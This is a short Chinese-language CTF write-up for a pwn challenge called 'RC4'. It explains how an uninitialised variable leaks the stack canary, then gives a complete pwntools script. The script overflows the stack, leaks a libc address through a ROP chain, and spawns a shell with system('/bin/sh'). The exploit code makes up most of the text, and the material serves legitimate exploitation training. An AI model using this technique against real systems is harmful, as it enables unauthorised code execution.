RC4
首先,检查一下程序的保护机制
然后,我们用IDA分析一下,存在栈溢出漏洞
由于开启了canary,因此,我们需要泄露canary,由于低位覆盖泄露出来的信息是加密的,解密可能比较麻烦,我们另选其他方法。功能a里有一个不起眼的漏洞
后面,输出了v7的内容
然而,v6和v7仅仅在dword_6020CC = 0时被初始化,如果它们未初始化,其值会是什么?
如果v7未初始化,其值就是canary的值。
因此,我们就用这种方法来泄露canary,然后就是正常的栈溢出操作
#coding:utf8
from pwn import *
from LibcSearcher import *
sh = process('./rc4')
#sh = remote('111.198.29.45',31957)
elf = ELF('./rc4')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4010BB
pop_rdi = 0x401283
def Generate_Key(c):
sh.sendlineafter('>','a')
sh.sendlineafter('>',c)
def Do_Encode(content):
sh.sendlineafter('>','b')
sh.sendline(content)
def Exit():
sh.sendlineafter('>','d')
sh.sendline()
Generate_Key('b')
Generate_Key('d')
data = sh.recvuntil('\n')[16:]
length = len(data)
canary = ''
for i in range(length-1,-1,-2):
canary += data[i-2:i]
canary = int(canary,16)
print 'canary=',hex(canary)
payload = 'a'*0x108 + p64(canary) + p64(0) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
Do_Encode(payload)
Exit()
sh.recvuntil('> ')
#泄露puts的地址
puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print 'libc_base=',hex(libc_base)
payload = 'a'*0x108 + p64(canary) + p64(0) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
Do_Encode(payload)
Exit()
sh.interactive()